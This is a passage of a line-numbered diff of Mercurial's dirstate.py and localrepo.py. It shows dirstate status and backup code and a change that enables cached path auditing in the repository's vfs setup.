1222 # - we're listing all clean files, or
1222 # - we're listing all clean files, or
1223 # - match.traversedir does something, because match.traversedir should
1223 # - match.traversedir does something, because match.traversedir should
1224 # be called for every dir in the working dir
1224 # be called for every dir in the working dir
1225 full = listclean or match.traversedir is not None
1225 full = listclean or match.traversedir is not None
1226 for fn, st in self.walk(match, subrepos, listunknown, listignored,
1226 for fn, st in self.walk(match, subrepos, listunknown, listignored,
1227 full=full).iteritems():
1227 full=full).iteritems():
1228 if fn not in dmap:
1228 if fn not in dmap:
1229 if (listignored or mexact(fn)) and dirignore(fn):
1229 if (listignored or mexact(fn)) and dirignore(fn):
1230 if listignored:
1230 if listignored:
1231 iadd(fn)
1231 iadd(fn)
1232 else:
1232 else:
1233 uadd(fn)
1233 uadd(fn)
1234 continue
1234 continue
1235
1235
1236 # This is equivalent to 'state, mode, size, time = dmap[fn]' but not
1236 # This is equivalent to 'state, mode, size, time = dmap[fn]' but not
1237 # written like that for performance reasons. dmap[fn] is not a
1237 # written like that for performance reasons. dmap[fn] is not a
1238 # Python tuple in compiled builds. The CPython UNPACK_SEQUENCE
1238 # Python tuple in compiled builds. The CPython UNPACK_SEQUENCE
1239 # opcode has fast paths when the value to be unpacked is a tuple or
1239 # opcode has fast paths when the value to be unpacked is a tuple or
1240 # a list, but falls back to creating a full-fledged iterator in
1240 # a list, but falls back to creating a full-fledged iterator in
1241 # general. That is much slower than simply accessing and storing the
1241 # general. That is much slower than simply accessing and storing the
1242 # tuple members one by one.
1242 # tuple members one by one.
1243 t = dmap[fn]
1243 t = dmap[fn]
1244 state = t[0]
1244 state = t[0]
1245 mode = t[1]
1245 mode = t[1]
1246 size = t[2]
1246 size = t[2]
1247 time = t[3]
1247 time = t[3]
1248
1248
1249 if not st and state in "nma":
1249 if not st and state in "nma":
1250 dadd(fn)
1250 dadd(fn)
1251 elif state == 'n':
1251 elif state == 'n':
1252 if (size >= 0 and
1252 if (size >= 0 and
1253 ((size != st.st_size and size != st.st_size & _rangemask)
1253 ((size != st.st_size and size != st.st_size & _rangemask)
1254 or ((mode ^ st.st_mode) & 0o100 and checkexec))
1254 or ((mode ^ st.st_mode) & 0o100 and checkexec))
1255 or size == -2 # other parent
1255 or size == -2 # other parent
1256 or fn in copymap):
1256 or fn in copymap):
1257 madd(fn)
1257 madd(fn)
1258 elif time != st.st_mtime and time != st.st_mtime & _rangemask:
1258 elif time != st.st_mtime and time != st.st_mtime & _rangemask:
1259 ladd(fn)
1259 ladd(fn)
1260 elif st.st_mtime == lastnormaltime:
1260 elif st.st_mtime == lastnormaltime:
1261 # fn may have just been marked as normal and it may have
1261 # fn may have just been marked as normal and it may have
1262 # changed in the same second without changing its size.
1262 # changed in the same second without changing its size.
1263 # This can happen if we quickly do multiple commits.
1263 # This can happen if we quickly do multiple commits.
1264 # Force lookup, so we don't miss such a racy file change.
1264 # Force lookup, so we don't miss such a racy file change.
1265 ladd(fn)
1265 ladd(fn)
1266 elif listclean:
1266 elif listclean:
1267 cadd(fn)
1267 cadd(fn)
1268 elif state == 'm':
1268 elif state == 'm':
1269 madd(fn)
1269 madd(fn)
1270 elif state == 'a':
1270 elif state == 'a':
1271 aadd(fn)
1271 aadd(fn)
1272 elif state == 'r':
1272 elif state == 'r':
1273 radd(fn)
1273 radd(fn)
1274
1274
1275 return (lookup, scmutil.status(modified, added, removed, deleted,
1275 return (lookup, scmutil.status(modified, added, removed, deleted,
1276 unknown, ignored, clean))
1276 unknown, ignored, clean))
1277
1277
1278 def matches(self, match):
1278 def matches(self, match):
1279 '''
1279 '''
1280 return files in the dirstate (in whatever state) filtered by match
1280 return files in the dirstate (in whatever state) filtered by match
1281 '''
1281 '''
1282 dmap = self._map
1282 dmap = self._map
1283 if match.always():
1283 if match.always():
1284 return dmap.keys()
1284 return dmap.keys()
1285 files = match.files()
1285 files = match.files()
1286 if match.isexact():
1286 if match.isexact():
1287 # fast path -- filter the other way around, since typically files is
1287 # fast path -- filter the other way around, since typically files is
1288 # much smaller than dmap
1288 # much smaller than dmap
1289 return [f for f in files if f in dmap]
1289 return [f for f in files if f in dmap]
1290 if match.prefix() and all(fn in dmap for fn in files):
1290 if match.prefix() and all(fn in dmap for fn in files):
1291 # fast path -- all the values are known to be files, so just return
1291 # fast path -- all the values are known to be files, so just return
1292 # that
1292 # that
1293 return list(files)
1293 return list(files)
1294 return [f for f in dmap if match(f)]
1294 return [f for f in dmap if match(f)]
1295
1295
1296 def _actualfilename(self, tr):
1296 def _actualfilename(self, tr):
1297 if tr:
1297 if tr:
1298 return self._pendingfilename
1298 return self._pendingfilename
1299 else:
1299 else:
1300 return self._filename
1300 return self._filename
1301
1301
1302 def savebackup(self, tr, backupname):
1302 def savebackup(self, tr, backupname):
1303 '''Save current dirstate into backup file'''
1303 '''Save current dirstate into backup file'''
1304 filename = self._actualfilename(tr)
1304 filename = self._actualfilename(tr)
1305 assert backupname != filename
1305 assert backupname != filename
1306
1306
1307 # use '_writedirstate' instead of 'write' to write changes certainly,
1307 # use '_writedirstate' instead of 'write' to write changes certainly,
1308 # because the latter omits writing out if transaction is running.
1308 # because the latter omits writing out if transaction is running.
1309 # output file will be used to create backup of dirstate at this point.
1309 # output file will be used to create backup of dirstate at this point.
1310 if self._dirty or not self._opener.exists(filename):
1310 if self._dirty or not self._opener.exists(filename):
1311 self._writedirstate(self._opener(filename, "w", atomictemp=True,
1311 self._writedirstate(self._opener(filename, "w", atomictemp=True,
1312 checkambig=True))
1312 checkambig=True))
1313
1313
1314 if tr:
1314 if tr:
1315 # ensure that subsequent tr.writepending returns True for
1315 # ensure that subsequent tr.writepending returns True for
1316 # changes written out above, even if dirstate is never
1316 # changes written out above, even if dirstate is never
1317 # changed after this
1317 # changed after this
1318 tr.addfilegenerator('dirstate', (self._filename,),
1318 tr.addfilegenerator('dirstate', (self._filename,),
1319 self._writedirstate, location='plain')
1319 self._writedirstate, location='plain')
1320
1320
1321 # ensure that pending file written above is unlinked at
1321 # ensure that pending file written above is unlinked at
1322 # failure, even if tr.writepending isn't invoked until the
1322 # failure, even if tr.writepending isn't invoked until the
1323 # end of this transaction
1323 # end of this transaction
1324 tr.registertmp(filename, location='plain')
1324 tr.registertmp(filename, location='plain')
1325
1325
1326 self._opener.tryunlink(backupname)
1326 self._opener.tryunlink(backupname)
1327 # hardlink backup is okay because _writedirstate is always called
1327 # hardlink backup is okay because _writedirstate is always called
1328 # with an "atomictemp=True" file.
1328 # with an "atomictemp=True" file.
1329 util.copyfile(self._opener.join(filename),
1329 util.copyfile(self._opener.join(filename),
1330 self._opener.join(backupname), hardlink=True)
1330 self._opener.join(backupname), hardlink=True)
1331
1331
1332 def restorebackup(self, tr, backupname):
1332 def restorebackup(self, tr, backupname):
1333 '''Restore dirstate by backup file'''
1333 '''Restore dirstate by backup file'''
1334 # this "invalidate()" prevents "wlock.release()" from writing
1334 # this "invalidate()" prevents "wlock.release()" from writing
1335 # changes of dirstate out after restoring from backup file
1335 # changes of dirstate out after restoring from backup file
1336 self.invalidate()
1336 self.invalidate()
1337 filename = self._actualfilename(tr)
1337 filename = self._actualfilename(tr)
1338 self._opener.rename(backupname, filename, checkambig=True)
1338 self._opener.rename(backupname, filename, checkambig=True)
1339
1339
1340 def clearbackup(self, tr, backupname):
1340 def clearbackup(self, tr, backupname):
1341 '''Clear backup file'''
1341 '''Clear backup file'''
1342 self._opener.unlink(backupname)
1342 self._opener.unlink(backupname)
@@ -1,2264 +1,2265 b''
1 # localrepo.py - read/write repository class for mercurial
1 # localrepo.py - read/write repository class for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import hashlib
11 import hashlib
12 import inspect
12 import inspect
13 import os
13 import os
14 import random
14 import random
15 import time
15 import time
16 import weakref
16 import weakref
17
17
18 from .i18n import _
18 from .i18n import _
19 from .node import (
19 from .node import (
20 hex,
20 hex,
21 nullid,
21 nullid,
22 short,
22 short,
23 )
23 )
24 from . import (
24 from . import (
25 bookmarks,
25 bookmarks,
26 branchmap,
26 branchmap,
27 bundle2,
27 bundle2,
28 changegroup,
28 changegroup,
29 changelog,
29 changelog,
30 color,
30 color,
31 context,
31 context,
32 dirstate,
32 dirstate,
33 dirstateguard,
33 dirstateguard,
34 encoding,
34 encoding,
35 error,
35 error,
36 exchange,
36 exchange,
37 extensions,
37 extensions,
38 filelog,
38 filelog,
39 hook,
39 hook,
40 lock as lockmod,
40 lock as lockmod,
41 manifest,
41 manifest,
42 match as matchmod,
42 match as matchmod,
43 merge as mergemod,
43 merge as mergemod,
44 mergeutil,
44 mergeutil,
45 namespaces,
45 namespaces,
46 obsolete,
46 obsolete,
47 pathutil,
47 pathutil,
48 peer,
48 peer,
49 phases,
49 phases,
50 pushkey,
50 pushkey,
51 pycompat,
51 pycompat,
52 repoview,
52 repoview,
53 revset,
53 revset,
54 revsetlang,
54 revsetlang,
55 scmutil,
55 scmutil,
56 sparse,
56 sparse,
57 store,
57 store,
58 subrepo,
58 subrepo,
59 tags as tagsmod,
59 tags as tagsmod,
60 transaction,
60 transaction,
61 txnutil,
61 txnutil,
62 util,
62 util,
63 vfs as vfsmod,
63 vfs as vfsmod,
64 )
64 )
65
65
66 release = lockmod.release
66 release = lockmod.release
67 urlerr = util.urlerr
67 urlerr = util.urlerr
68 urlreq = util.urlreq
68 urlreq = util.urlreq
69
69
70 # set of (path, vfs-location) tuples. vfs-location is:
70 # set of (path, vfs-location) tuples. vfs-location is:
71 # - 'plain for vfs relative paths
71 # - 'plain for vfs relative paths
72 # - '' for svfs relative paths
72 # - '' for svfs relative paths
73 _cachedfiles = set()
73 _cachedfiles = set()
74
74
75 class _basefilecache(scmutil.filecache):
75 class _basefilecache(scmutil.filecache):
76 """All filecache usage on repo are done for logic that should be unfiltered
76 """All filecache usage on repo are done for logic that should be unfiltered
77 """
77 """
78 def __get__(self, repo, type=None):
78 def __get__(self, repo, type=None):
79 if repo is None:
79 if repo is None:
80 return self
80 return self
81 return super(_basefilecache, self).__get__(repo.unfiltered(), type)
81 return super(_basefilecache, self).__get__(repo.unfiltered(), type)
82 def __set__(self, repo, value):
82 def __set__(self, repo, value):
83 return super(_basefilecache, self).__set__(repo.unfiltered(), value)
83 return super(_basefilecache, self).__set__(repo.unfiltered(), value)
84 def __delete__(self, repo):
84 def __delete__(self, repo):
85 return super(_basefilecache, self).__delete__(repo.unfiltered())
85 return super(_basefilecache, self).__delete__(repo.unfiltered())
86
86
87 class repofilecache(_basefilecache):
87 class repofilecache(_basefilecache):
88 """filecache for files in .hg but outside of .hg/store"""
88 """filecache for files in .hg but outside of .hg/store"""
89 def __init__(self, *paths):
89 def __init__(self, *paths):
90 super(repofilecache, self).__init__(*paths)
90 super(repofilecache, self).__init__(*paths)
91 for path in paths:
91 for path in paths:
92 _cachedfiles.add((path, 'plain'))
92 _cachedfiles.add((path, 'plain'))
93
93
94 def join(self, obj, fname):
94 def join(self, obj, fname):
95 return obj.vfs.join(fname)
95 return obj.vfs.join(fname)
96
96
97 class storecache(_basefilecache):
97 class storecache(_basefilecache):
98 """filecache for files in the store"""
98 """filecache for files in the store"""
99 def __init__(self, *paths):
99 def __init__(self, *paths):
100 super(storecache, self).__init__(*paths)
100 super(storecache, self).__init__(*paths)
101 for path in paths:
101 for path in paths:
102 _cachedfiles.add((path, ''))
102 _cachedfiles.add((path, ''))
103
103
104 def join(self, obj, fname):
104 def join(self, obj, fname):
105 return obj.sjoin(fname)
105 return obj.sjoin(fname)
106
106
107 def isfilecached(repo, name):
107 def isfilecached(repo, name):
108 """check if a repo has already cached "name" filecache-ed property
108 """check if a repo has already cached "name" filecache-ed property
109
109
110 This returns (cachedobj-or-None, iscached) tuple.
110 This returns (cachedobj-or-None, iscached) tuple.
111 """
111 """
112 cacheentry = repo.unfiltered()._filecache.get(name, None)
112 cacheentry = repo.unfiltered()._filecache.get(name, None)
113 if not cacheentry:
113 if not cacheentry:
114 return None, False
114 return None, False
115 return cacheentry.obj, True
115 return cacheentry.obj, True
116
116
117 class unfilteredpropertycache(util.propertycache):
117 class unfilteredpropertycache(util.propertycache):
118 """propertycache that apply to unfiltered repo only"""
118 """propertycache that apply to unfiltered repo only"""
119
119
120 def __get__(self, repo, type=None):
120 def __get__(self, repo, type=None):
121 unfi = repo.unfiltered()
121 unfi = repo.unfiltered()
122 if unfi is repo:
122 if unfi is repo:
123 return super(unfilteredpropertycache, self).__get__(unfi)
123 return super(unfilteredpropertycache, self).__get__(unfi)
124 return getattr(unfi, self.name)
124 return getattr(unfi, self.name)
125
125
126 class filteredpropertycache(util.propertycache):
126 class filteredpropertycache(util.propertycache):
127 """propertycache that must take filtering in account"""
127 """propertycache that must take filtering in account"""
128
128
129 def cachevalue(self, obj, value):
129 def cachevalue(self, obj, value):
130 object.__setattr__(obj, self.name, value)
130 object.__setattr__(obj, self.name, value)
131
131
132
132
133 def hasunfilteredcache(repo, name):
133 def hasunfilteredcache(repo, name):
134 """check if a repo has an unfilteredpropertycache value for <name>"""
134 """check if a repo has an unfilteredpropertycache value for <name>"""
135 return name in vars(repo.unfiltered())
135 return name in vars(repo.unfiltered())
136
136
137 def unfilteredmethod(orig):
137 def unfilteredmethod(orig):
138 """decorate method that always need to be run on unfiltered version"""
138 """decorate method that always need to be run on unfiltered version"""
139 def wrapper(repo, *args, **kwargs):
139 def wrapper(repo, *args, **kwargs):
140 return orig(repo.unfiltered(), *args, **kwargs)
140 return orig(repo.unfiltered(), *args, **kwargs)
141 return wrapper
141 return wrapper
142
142
143 moderncaps = {'lookup', 'branchmap', 'pushkey', 'known', 'getbundle',
143 moderncaps = {'lookup', 'branchmap', 'pushkey', 'known', 'getbundle',
144 'unbundle'}
144 'unbundle'}
145 legacycaps = moderncaps.union({'changegroupsubset'})
145 legacycaps = moderncaps.union({'changegroupsubset'})
146
146
147 class localpeer(peer.peerrepository):
147 class localpeer(peer.peerrepository):
148 '''peer for a local repo; reflects only the most recent API'''
148 '''peer for a local repo; reflects only the most recent API'''
149
149
150 def __init__(self, repo, caps=None):
150 def __init__(self, repo, caps=None):
151 if caps is None:
151 if caps is None:
152 caps = moderncaps.copy()
152 caps = moderncaps.copy()
153 peer.peerrepository.__init__(self)
153 peer.peerrepository.__init__(self)
154 self._repo = repo.filtered('served')
154 self._repo = repo.filtered('served')
155 self.ui = repo.ui
155 self.ui = repo.ui
156 self._caps = repo._restrictcapabilities(caps)
156 self._caps = repo._restrictcapabilities(caps)
157
157
158 def close(self):
158 def close(self):
159 self._repo.close()
159 self._repo.close()
160
160
161 def _capabilities(self):
161 def _capabilities(self):
162 return self._caps
162 return self._caps
163
163
164 def local(self):
164 def local(self):
165 return self._repo
165 return self._repo
166
166
167 def canpush(self):
167 def canpush(self):
168 return True
168 return True
169
169
170 def url(self):
170 def url(self):
171 return self._repo.url()
171 return self._repo.url()
172
172
173 def lookup(self, key):
173 def lookup(self, key):
174 return self._repo.lookup(key)
174 return self._repo.lookup(key)
175
175
176 def branchmap(self):
176 def branchmap(self):
177 return self._repo.branchmap()
177 return self._repo.branchmap()
178
178
179 def heads(self):
179 def heads(self):
180 return self._repo.heads()
180 return self._repo.heads()
181
181
182 def known(self, nodes):
182 def known(self, nodes):
183 return self._repo.known(nodes)
183 return self._repo.known(nodes)
184
184
185 def getbundle(self, source, heads=None, common=None, bundlecaps=None,
185 def getbundle(self, source, heads=None, common=None, bundlecaps=None,
186 **kwargs):
186 **kwargs):
187 chunks = exchange.getbundlechunks(self._repo, source, heads=heads,
187 chunks = exchange.getbundlechunks(self._repo, source, heads=heads,
188 common=common, bundlecaps=bundlecaps,
188 common=common, bundlecaps=bundlecaps,
189 **kwargs)
189 **kwargs)
190 cb = util.chunkbuffer(chunks)
190 cb = util.chunkbuffer(chunks)
191
191
192 if exchange.bundle2requested(bundlecaps):
192 if exchange.bundle2requested(bundlecaps):
193 # When requesting a bundle2, getbundle returns a stream to make the
193 # When requesting a bundle2, getbundle returns a stream to make the
194 # wire level function happier. We need to build a proper object
194 # wire level function happier. We need to build a proper object
195 # from it in local peer.
195 # from it in local peer.
196 return bundle2.getunbundler(self.ui, cb)
196 return bundle2.getunbundler(self.ui, cb)
197 else:
197 else:
198 return changegroup.getunbundler('01', cb, None)
198 return changegroup.getunbundler('01', cb, None)
199
199
200 # TODO We might want to move the next two calls into legacypeer and add
200 # TODO We might want to move the next two calls into legacypeer and add
201 # unbundle instead.
201 # unbundle instead.
202
202
203 def unbundle(self, cg, heads, url):
203 def unbundle(self, cg, heads, url):
204 """apply a bundle on a repo
204 """apply a bundle on a repo
205
205
206 This function handles the repo locking itself."""
206 This function handles the repo locking itself."""
207 try:
207 try:
208 try:
208 try:
209 cg = exchange.readbundle(self.ui, cg, None)
209 cg = exchange.readbundle(self.ui, cg, None)
210 ret = exchange.unbundle(self._repo, cg, heads, 'push', url)
210 ret = exchange.unbundle(self._repo, cg, heads, 'push', url)
211 if util.safehasattr(ret, 'getchunks'):
211 if util.safehasattr(ret, 'getchunks'):
212 # This is a bundle20 object, turn it into an unbundler.
212 # This is a bundle20 object, turn it into an unbundler.
213 # This little dance should be dropped eventually when the
213 # This little dance should be dropped eventually when the
214 # API is finally improved.
214 # API is finally improved.
215 stream = util.chunkbuffer(ret.getchunks())
215 stream = util.chunkbuffer(ret.getchunks())
216 ret = bundle2.getunbundler(self.ui, stream)
216 ret = bundle2.getunbundler(self.ui, stream)
217 return ret
217 return ret
218 except Exception as exc:
218 except Exception as exc:
219 # If the exception contains output salvaged from a bundle2
219 # If the exception contains output salvaged from a bundle2
220 # reply, we need to make sure it is printed before continuing
220 # reply, we need to make sure it is printed before continuing
221 # to fail. So we build a bundle2 with such output and consume
221 # to fail. So we build a bundle2 with such output and consume
222 # it directly.
222 # it directly.
223 #
223 #
224 # This is not very elegant but allows a "simple" solution for
224 # This is not very elegant but allows a "simple" solution for
225 # issue4594
225 # issue4594
226 output = getattr(exc, '_bundle2salvagedoutput', ())
226 output = getattr(exc, '_bundle2salvagedoutput', ())
227 if output:
227 if output:
228 bundler = bundle2.bundle20(self._repo.ui)
228 bundler = bundle2.bundle20(self._repo.ui)
229 for out in output:
229 for out in output:
230 bundler.addpart(out)
230 bundler.addpart(out)
231 stream = util.chunkbuffer(bundler.getchunks())
231 stream = util.chunkbuffer(bundler.getchunks())
232 b = bundle2.getunbundler(self.ui, stream)
232 b = bundle2.getunbundler(self.ui, stream)
233 bundle2.processbundle(self._repo, b)
233 bundle2.processbundle(self._repo, b)
234 raise
234 raise
235 except error.PushRaced as exc:
235 except error.PushRaced as exc:
236 raise error.ResponseError(_('push failed:'), str(exc))
236 raise error.ResponseError(_('push failed:'), str(exc))
237
237
238 def pushkey(self, namespace, key, old, new):
238 def pushkey(self, namespace, key, old, new):
239 return self._repo.pushkey(namespace, key, old, new)
239 return self._repo.pushkey(namespace, key, old, new)
240
240
241 def listkeys(self, namespace):
241 def listkeys(self, namespace):
242 return self._repo.listkeys(namespace)
242 return self._repo.listkeys(namespace)
243
243
244 def debugwireargs(self, one, two, three=None, four=None, five=None):
244 def debugwireargs(self, one, two, three=None, four=None, five=None):
245 '''used to test argument passing over the wire'''
245 '''used to test argument passing over the wire'''
246 return "%s %s %s %s %s" % (one, two, three, four, five)
246 return "%s %s %s %s %s" % (one, two, three, four, five)
247
247
248 class locallegacypeer(localpeer):
248 class locallegacypeer(localpeer):
249 '''peer extension which implements legacy methods too; used for tests with
249 '''peer extension which implements legacy methods too; used for tests with
250 restricted capabilities'''
250 restricted capabilities'''
251
251
252 def __init__(self, repo):
252 def __init__(self, repo):
253 localpeer.__init__(self, repo, caps=legacycaps)
253 localpeer.__init__(self, repo, caps=legacycaps)
254
254
255 def branches(self, nodes):
255 def branches(self, nodes):
256 return self._repo.branches(nodes)
256 return self._repo.branches(nodes)
257
257
258 def between(self, pairs):
258 def between(self, pairs):
259 return self._repo.between(pairs)
259 return self._repo.between(pairs)
260
260
261 def changegroup(self, basenodes, source):
261 def changegroup(self, basenodes, source):
262 return changegroup.changegroup(self._repo, basenodes, source)
262 return changegroup.changegroup(self._repo, basenodes, source)
263
263
264 def changegroupsubset(self, bases, heads, source):
264 def changegroupsubset(self, bases, heads, source):
265 return changegroup.changegroupsubset(self._repo, bases, heads, source)
265 return changegroup.changegroupsubset(self._repo, bases, heads, source)
266
266
267 # Increment the sub-version when the revlog v2 format changes to lock out old
267 # Increment the sub-version when the revlog v2 format changes to lock out old
268 # clients.
268 # clients.
269 REVLOGV2_REQUIREMENT = 'exp-revlogv2.0'
269 REVLOGV2_REQUIREMENT = 'exp-revlogv2.0'
270
270
271 class localrepository(object):
271 class localrepository(object):
272
272
273 supportedformats = {
273 supportedformats = {
274 'revlogv1',
274 'revlogv1',
275 'generaldelta',
275 'generaldelta',
276 'treemanifest',
276 'treemanifest',
277 'manifestv2',
277 'manifestv2',
278 REVLOGV2_REQUIREMENT,
278 REVLOGV2_REQUIREMENT,
279 }
279 }
280 _basesupported = supportedformats | {
280 _basesupported = supportedformats | {
281 'store',
281 'store',
282 'fncache',
282 'fncache',
283 'shared',
283 'shared',
284 'relshared',
284 'relshared',
285 'dotencode',
285 'dotencode',
286 'exp-sparse',
286 'exp-sparse',
287 }
287 }
288 openerreqs = {
288 openerreqs = {
289 'revlogv1',
289 'revlogv1',
290 'generaldelta',
290 'generaldelta',
291 'treemanifest',
291 'treemanifest',
292 'manifestv2',
292 'manifestv2',
293 }
293 }
294
294
295 # a list of (ui, featureset) functions.
295 # a list of (ui, featureset) functions.
296 # only functions defined in module of enabled extensions are invoked
296 # only functions defined in module of enabled extensions are invoked
297 featuresetupfuncs = set()
297 featuresetupfuncs = set()
298
298
299 # list of prefix for file which can be written without 'wlock'
299 # list of prefix for file which can be written without 'wlock'
300 # Extensions should extend this list when needed
300 # Extensions should extend this list when needed
301 _wlockfreeprefix = {
301 _wlockfreeprefix = {
302 # We migh consider requiring 'wlock' for the next
302 # We migh consider requiring 'wlock' for the next
303 # two, but pretty much all the existing code assume
303 # two, but pretty much all the existing code assume
304 # wlock is not needed so we keep them excluded for
304 # wlock is not needed so we keep them excluded for
305 # now.
305 # now.
306 'hgrc',
306 'hgrc',
307 'requires',
307 'requires',
308 # XXX cache is a complicatged business someone
308 # XXX cache is a complicatged business someone
309 # should investigate this in depth at some point
309 # should investigate this in depth at some point
310 'cache/',
310 'cache/',
311 # XXX shouldn't be dirstate covered by the wlock?
311 # XXX shouldn't be dirstate covered by the wlock?
312 'dirstate',
312 'dirstate',
313 # XXX bisect was still a bit too messy at the time
313 # XXX bisect was still a bit too messy at the time
314 # this changeset was introduced. Someone should fix
314 # this changeset was introduced. Someone should fix
315 # the remainig bit and drop this line
315 # the remainig bit and drop this line
316 'bisect.state',
316 'bisect.state',
317 }
317 }
318
318
319 def __init__(self, baseui, path, create=False):
319 def __init__(self, baseui, path, create=False):
320 self.requirements = set()
320 self.requirements = set()
321 self.filtername = None
321 self.filtername = None
322 # wvfs: rooted at the repository root, used to access the working copy
322 # wvfs: rooted at the repository root, used to access the working copy
323 self.wvfs = vfsmod.vfs(path, expandpath=True, realpath=True)
323 self.wvfs = vfsmod.vfs(path, expandpath=True, realpath=True)
324 # vfs: rooted at .hg, used to access repo files outside of .hg/store
324 # vfs: rooted at .hg, used to access repo files outside of .hg/store
325 self.vfs = None
325 self.vfs = None
326 # svfs: usually rooted at .hg/store, used to access repository history
326 # svfs: usually rooted at .hg/store, used to access repository history
327 # If this is a shared repository, this vfs may point to another
327 # If this is a shared repository, this vfs may point to another
328 # repository's .hg/store directory.
328 # repository's .hg/store directory.
329 self.svfs = None
329 self.svfs = None
330 self.root = self.wvfs.base
330 self.root = self.wvfs.base
331 self.path = self.wvfs.join(".hg")
331 self.path = self.wvfs.join(".hg")
332 self.origroot = path
332 self.origroot = path
333 # These auditor are not used by the vfs,
333 # These auditor are not used by the vfs,
334 # only used when writing this comment: basectx.match
334 # only used when writing this comment: basectx.match
335 self.auditor = pathutil.pathauditor(self.root, self._checknested)
335 self.auditor = pathutil.pathauditor(self.root, self._checknested)
336 self.nofsauditor = pathutil.pathauditor(self.root, self._checknested,
336 self.nofsauditor = pathutil.pathauditor(self.root, self._checknested,
337 realfs=False)
337 realfs=False, cached=True)
338 self.baseui = baseui
338 self.baseui = baseui
339 self.ui = baseui.copy()
339 self.ui = baseui.copy()
340 self.ui.copy = baseui.copy # prevent copying repo configuration
340 self.ui.copy = baseui.copy # prevent copying repo configuration
341 self.vfs = vfsmod.vfs(self.path)
341 self.vfs = vfsmod.vfs(self.path, cacheaudited=True)
342 if (self.ui.configbool('devel', 'all-warnings') or
342 if (self.ui.configbool('devel', 'all-warnings') or
343 self.ui.configbool('devel', 'check-locks')):
343 self.ui.configbool('devel', 'check-locks')):
344 self.vfs.audit = self._getvfsward(self.vfs.audit)
344 self.vfs.audit = self._getvfsward(self.vfs.audit)
345 # A list of callback to shape the phase if no data were found.
345 # A list of callback to shape the phase if no data were found.
346 # Callback are in the form: func(repo, roots) --> processed root.
346 # Callback are in the form: func(repo, roots) --> processed root.
347 # This list it to be filled by extension during repo setup
347 # This list it to be filled by extension during repo setup
348 self._phasedefaults = []
348 self._phasedefaults = []
349 try:
349 try:
350 self.ui.readconfig(self.vfs.join("hgrc"), self.root)
350 self.ui.readconfig(self.vfs.join("hgrc"), self.root)
351 self._loadextensions()
351 self._loadextensions()
352 except IOError:
352 except IOError:
353 pass
353 pass
354
354
355 if self.featuresetupfuncs:
355 if self.featuresetupfuncs:
356 self.supported = set(self._basesupported) # use private copy
356 self.supported = set(self._basesupported) # use private copy
357 extmods = set(m.__name__ for n, m
357 extmods = set(m.__name__ for n, m
358 in extensions.extensions(self.ui))
358 in extensions.extensions(self.ui))
359 for setupfunc in self.featuresetupfuncs:
359 for setupfunc in self.featuresetupfuncs:
360 if setupfunc.__module__ in extmods:
360 if setupfunc.__module__ in extmods:
361 setupfunc(self.ui, self.supported)
361 setupfunc(self.ui, self.supported)
362 else:
362 else:
363 self.supported = self._basesupported
363 self.supported = self._basesupported
364 color.setup(self.ui)
364 color.setup(self.ui)
365
365
366 # Add compression engines.
366 # Add compression engines.
367 for name in util.compengines:
367 for name in util.compengines:
368 engine = util.compengines[name]
368 engine = util.compengines[name]
369 if engine.revlogheader():
369 if engine.revlogheader():
370 self.supported.add('exp-compression-%s' % name)
370 self.supported.add('exp-compression-%s' % name)
371
371
372 if not self.vfs.isdir():
372 if not self.vfs.isdir():
373 if create:
373 if create:
374 self.requirements = newreporequirements(self)
374 self.requirements = newreporequirements(self)
375
375
376 if not self.wvfs.exists():
376 if not self.wvfs.exists():
377 self.wvfs.makedirs()
377 self.wvfs.makedirs()
378 self.vfs.makedir(notindexed=True)
378 self.vfs.makedir(notindexed=True)
379
379
380 if 'store' in self.requirements:
380 if 'store' in self.requirements:
381 self.vfs.mkdir("store")
381 self.vfs.mkdir("store")
382
382
383 # create an invalid changelog
383 # create an invalid changelog
384 self.vfs.append(
384 self.vfs.append(
385 "00changelog.i",
385 "00changelog.i",
386 '\0\0\0\2' # represents revlogv2
386 '\0\0\0\2' # represents revlogv2
387 ' dummy changelog to prevent using the old repo layout'
387 ' dummy changelog to prevent using the old repo layout'
388 )
388 )
389 else:
389 else:
390 raise error.RepoError(_("repository %s not found") % path)
390 raise error.RepoError(_("repository %s not found") % path)
391 elif create:
391 elif create:
392 raise error.RepoError(_("repository %s already exists") % path)
392 raise error.RepoError(_("repository %s already exists") % path)
393 else:
393 else:
394 try:
394 try:
395 self.requirements = scmutil.readrequires(
395 self.requirements = scmutil.readrequires(
396 self.vfs, self.supported)
396 self.vfs, self.supported)
397 except IOError as inst:
397 except IOError as inst:
398 if inst.errno != errno.ENOENT:
398 if inst.errno != errno.ENOENT:
399 raise
399 raise
400
400
401 cachepath = self.vfs.join('cache')
401 cachepath = self.vfs.join('cache')
402 self.sharedpath = self.path
402 self.sharedpath = self.path
403 try:
403 try:
404 sharedpath = self.vfs.read("sharedpath").rstrip('\n')
404 sharedpath = self.vfs.read("sharedpath").rstrip('\n')
405 if 'relshared' in self.requirements:
405 if 'relshared' in self.requirements:
406 sharedpath = self.vfs.join(sharedpath)
406 sharedpath = self.vfs.join(sharedpath)
407 vfs = vfsmod.vfs(sharedpath, realpath=True)
407 vfs = vfsmod.vfs(sharedpath, realpath=True)
408 cachepath = vfs.join('cache')
408 cachepath = vfs.join('cache')
409 s = vfs.base
409 s = vfs.base
410 if not vfs.exists():
410 if not vfs.exists():
411 raise error.RepoError(
411 raise error.RepoError(
412 _('.hg/sharedpath points to nonexistent directory %s') % s)
412 _('.hg/sharedpath points to nonexistent directory %s') % s)
413 self.sharedpath = s
413 self.sharedpath = s
414 except IOError as inst:
414 except IOError as inst:
415 if inst.errno != errno.ENOENT:
415 if inst.errno != errno.ENOENT:
416 raise
416 raise
417
417
418 if 'exp-sparse' in self.requirements and not sparse.enabled:
418 if 'exp-sparse' in self.requirements and not sparse.enabled:
419 raise error.RepoError(_('repository is using sparse feature but '
419 raise error.RepoError(_('repository is using sparse feature but '
420 'sparse is not enabled; enable the '
420 'sparse is not enabled; enable the '
421 '"sparse" extensions to access'))
421 '"sparse" extensions to access'))
422
422
423 self.store = store.store(
423 self.store = store.store(
424 self.requirements, self.sharedpath, vfsmod.vfs)
424 self.requirements, self.sharedpath,
425 lambda base: vfsmod.vfs(base, cacheaudited=True))
425 self.spath = self.store.path
